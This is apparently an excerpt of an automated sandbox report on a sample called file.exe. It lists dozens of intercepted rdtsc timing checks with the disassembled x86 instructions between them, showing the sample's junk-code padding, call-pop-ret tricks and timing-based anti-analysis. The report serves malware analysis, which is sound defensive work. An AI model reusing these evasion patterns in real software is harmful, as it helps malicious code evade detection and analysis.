Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DD840 second address: 5DD846 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DB811 second address: 5DB81C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F0148B58146h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DD846 second address: 5DD84A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DDA5B second address: 5DDA5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DDA5F second address: 5DDA76 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0148C8B7AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DF662 second address: 5DF6DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0148B5814Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c pushad 0x0000000d mov dword ptr [ebp+1247E6ACh], ecx 0x00000013 popad 0x00000014 push 00000000h 0x00000016 jmp 00007F0148B58152h 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push ebx 0x00000020 call 00007F0148B58148h 0x00000025 pop ebx 0x00000026 mov dword ptr [esp+04h], ebx 0x0000002a add dword ptr [esp+04h], 00000014h 0x00000032 inc ebx 0x00000033 push ebx 0x00000034 ret 0x00000035 pop ebx 0x00000036 ret 0x00000037 sub edi, 6C1CEC36h 0x0000003d xchg eax, esi 0x0000003e pushad 0x0000003f pushad 0x00000040 pushad 0x00000041 popad 0x00000042 jne 00007F0148B58146h 0x00000048 popad 0x00000049 jmp 00007F0148B58151h 0x0000004e popad 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 jnl 00007F0148B58146h 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DDA76 second address: 5DDA7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DF6DF second address: 5DF6E9 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0148B58146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DF80F second address: 5DF8A4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov bx, 573Fh 0x0000000d push dword ptr fs:[00000000h] 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007F0148C8B7A8h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 0000001Ch 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e mov di, ax 0x00000031 mov dword ptr fs:[00000000h], esp 0x00000038 pushad 0x00000039 sub dword ptr [ebp+122D2DFDh], eax 0x0000003f jmp 00007F0148C8B7B3h 0x00000044 popad 0x00000045 mov eax, dword ptr [ebp+122D045Dh] 0x0000004b mov edi, dword ptr [ebp+122D21DDh] 0x00000051 push FFFFFFFFh 0x00000053 push 00000000h 0x00000055 push esi 0x00000056 call 00007F0148C8B7A8h 0x0000005b pop esi 0x0000005c mov dword ptr [esp+04h], esi 0x00000060 add dword ptr [esp+04h], 00000019h 0x00000068 inc esi 0x00000069 push esi 0x0000006a ret 0x0000006b pop esi 0x0000006c ret 0x0000006d mov di, 246Ah 0x00000071 push eax 0x00000072 push ebx 0x00000073 pushad 0x00000074 push eax 0x00000075 push edx 0x00000076 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DF8A4 second address: 5DF8AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E38F7 second address: 5E3901 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F0148C8B7A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E2895 second address: 5E290E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push ebx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 pop ebx 0x00000011 nop 0x00000012 mov bx, ax 0x00000015 push dword ptr fs:[00000000h] 0x0000001c or bx, A19Ch 0x00000021 mov dword ptr fs:[00000000h], esp 0x00000028 push 00000000h 0x0000002a push edx 0x0000002b call 00007F0148B58148h 0x00000030 pop edx 0x00000031 mov dword ptr [esp+04h], edx 0x00000035 add dword ptr [esp+04h], 0000001Ah 0x0000003d inc edx 0x0000003e push edx 0x0000003f ret 0x00000040 pop edx 0x00000041 ret 0x00000042 mov ebx, dword ptr [ebp+122D2A13h] 0x00000048 movsx edi, bx 0x0000004b mov eax, dword ptr [ebp+122D0DD1h] 0x00000051 mov edi, ebx 0x00000053 push FFFFFFFFh 0x00000055 mov ebx, edi 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007F0148B58157h 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E6977 second address: 5E6981 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E290E second address: 5E2925 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0148B58153h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E16EB second address: 5E16F5 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0148C8B7A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E6981 second address: 5E6A15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007F0148B58148h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 0000001Ch 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push ebx 0x00000028 call 00007F0148B58148h 0x0000002d pop ebx 0x0000002e mov dword ptr [esp+04h], ebx 0x00000032 add dword ptr [esp+04h], 0000001Ah 0x0000003a inc ebx 0x0000003b push ebx 0x0000003c ret 0x0000003d pop ebx 0x0000003e ret 0x0000003f jmp 00007F0148B5814Fh 0x00000044 push 00000000h 0x00000046 push 00000000h 0x00000048 push ebx 0x00000049 call 00007F0148B58148h 0x0000004e pop ebx 0x0000004f mov dword ptr [esp+04h], ebx 0x00000053 add dword ptr [esp+04h], 00000018h 0x0000005b inc ebx 0x0000005c push ebx 0x0000005d ret 0x0000005e pop ebx 0x0000005f ret 0x00000060 movsx edi, si 0x00000063 xchg eax, esi 0x00000064 push eax 0x00000065 push edx 0x00000066 jnc 00007F0148B5814Ch 0x0000006c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E16F5 second address: 5E16FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E6A15 second address: 5E6A1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E16FB second address: 5E16FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E6A1B second address: 5E6A1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E16FF second address: 5E1703 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E6A1F second address: 5E6A30 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push edi 0x0000000f pop edi 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E6BBA second address: 5E6BBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E7BDE second address: 5E7C41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 nop 0x00000008 mov dword ptr [ebp+122D223Dh], esi 0x0000000e push dword ptr fs:[00000000h] 0x00000015 sub dword ptr [ebp+122D27FDh], ebx 0x0000001b mov dword ptr fs:[00000000h], esp 0x00000022 push 00000000h 0x00000024 push edi 0x00000025 call 00007F0148B58148h 0x0000002a pop edi 0x0000002b mov dword ptr [esp+04h], edi 0x0000002f add dword ptr [esp+04h], 00000016h 0x00000037 inc edi 0x00000038 push edi 0x00000039 ret 0x0000003a pop edi 0x0000003b ret 0x0000003c mov eax, dword ptr [ebp+122D0405h] 0x00000042 sub bx, BE93h 0x00000047 push FFFFFFFFh 0x00000049 nop 0x0000004a jmp 00007F0148B5814Bh 0x0000004f push eax 0x00000050 pushad 0x00000051 push eax 0x00000052 push edx 0x00000053 jo 00007F0148B58146h 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E7C41 second address: 5E7C45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E7C45 second address: 5E7C4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E8C85 second address: 5E8C89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E8C89 second address: 5E8CA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0148B58154h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E8CA7 second address: 5E8CAC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F258A second address: 5F259B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F0148B58146h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F259B second address: 5F25A1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F25A1 second address: 5F25B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jbe 00007F0148B5814Eh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F29AE second address: 5F29C3 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0148C8B7A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F0148C8B7ABh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F29C3 second address: 5F29C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F6C3B second address: 5F6C41 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F929E second address: 5F92BE instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0148B58146h 0x00000008 jmp 00007F0148B58156h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5FEB61 second address: 5FEB67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5FECDB second address: 5FECEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0148B5814Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5FECEE second address: 5FED07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0148C8B7B5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5FF212 second address: 5FF217 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5FF217 second address: 5FF21D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5FF21D second address: 5FF221 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58B138 second address: 58B14C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 pushad 0x00000007 jg 00007F0148C8B7A8h 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 607472 second address: 607476 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 607476 second address: 60747A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 607AD2 second address: 607ADC instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0148B58146h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 607ADC second address: 607AED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F0148C8B7A8h 0x0000000c push esi 0x0000000d pop esi 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 607EFB second address: 607EFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 608470 second address: 60847C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F0148C8B7A6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 60847C second address: 608481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 606E99 second address: 606EB4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0148C8B7B6h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 606EB4 second address: 606EDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0148B58159h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 606EDB second address: 606EE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 606EE2 second address: 606EE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 60F443 second address: 60F46B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0148C8B7B5h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007F0148C8B7A6h 0x00000012 jc 00007F0148C8B7A6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 60F46B second address: 60F46F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 587AD6 second address: 587AE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0148C8B7AAh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 587AE8 second address: 587B02 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0148B58146h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jo 00007F0148B58152h 0x00000012 jl 00007F0148B58146h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 587B02 second address: 587B16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007F0148C8B7BCh 0x0000000b pushad 0x0000000c jp 00007F0148C8B7A6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 60E2A7 second address: 60E2AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 60E2AB second address: 60E2C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007F0148C8B7ACh 0x0000000e jns 00007F0148C8B7A6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 60E2C8 second address: 60E2E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F0148B5814Fh 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 60E2E3 second address: 60E2F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007F0148C8B7A6h 0x0000000d jnp 00007F0148C8B7A6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 60E2F6 second address: 60E2FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 60E858 second address: 60E881 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0148C8B7A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F0148C8B7AAh 0x00000010 jmp 00007F0148C8B7B3h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 60EBA0 second address: 60EBA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 60EBA4 second address: 60EBC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0148C8B7B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007F0148C8B7A6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 60EBC3 second address: 60EBC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 60ED04 second address: 60ED0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 60ED0A second address: 60ED0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 60ED0E second address: 60ED1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007F0148C8B7A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 60ED1D second address: 60ED23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 60EE86 second address: 60EE8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6140F2 second address: 61410E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0148B58158h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6186EB second address: 6186EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6186EF second address: 6186F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D6B4E second address: 5D6B81 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0148C8B7B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a movzx edx, di 0x0000000d lea eax, dword ptr [ebp+1248A902h] 0x00000013 add di, B0A0h 0x00000018 push eax 0x00000019 jp 00007F0148C8B7B2h 0x0000001f ja 00007F0148C8B7ACh 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D6B81 second address: 5B5565 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dword ptr [esp], eax 0x00000007 push 00000000h 0x00000009 push edi 0x0000000a call 00007F0148B58148h 0x0000000f pop edi 0x00000010 mov dword ptr [esp+04h], edi 0x00000014 add dword ptr [esp+04h], 00000015h 0x0000001c inc edi 0x0000001d push edi 0x0000001e ret 0x0000001f pop edi 0x00000020 ret 0x00000021 call dword ptr [ebp+122D5658h] 0x00000027 jp 00007F0148B58150h 0x0000002d push ebx 0x0000002e pushad 0x0000002f popad 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D6CF4 second address: 5D6D0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0148C8B7B4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D6D0C second address: 5D6D10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D72CF second address: 5D72D5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D72D5 second address: 5D72DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D7AF9 second address: 5D7AFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D7DE9 second address: 5D7DED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D7DED second address: 5D7E64 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0148C8B7A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F0148C8B7AAh 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 popad 0x00000014 mov dword ptr [esp], eax 0x00000017 push 00000000h 0x00000019 push edx 0x0000001a call 00007F0148C8B7A8h 0x0000001f pop edx 0x00000020 mov dword ptr [esp+04h], edx 0x00000024 add dword ptr [esp+04h], 00000016h 0x0000002c inc edx 0x0000002d push edx 0x0000002e ret 0x0000002f pop edx 0x00000030 ret 0x00000031 mov edi, dword ptr [ebp+122D1B4Bh] 0x00000037 lea eax, dword ptr [ebp+1248A946h] 0x0000003d push 00000000h 0x0000003f push edx 0x00000040 call 00007F0148C8B7A8h 0x00000045 pop edx 0x00000046 mov dword ptr [esp+04h], edx 0x0000004a add dword ptr [esp+04h], 0000001Ch 0x00000052 inc edx 0x00000053 push edx 0x00000054 ret 0x00000055 pop edx 0x00000056 ret 0x00000057 xor dword ptr [ebp+12452118h], edx 0x0000005d push eax 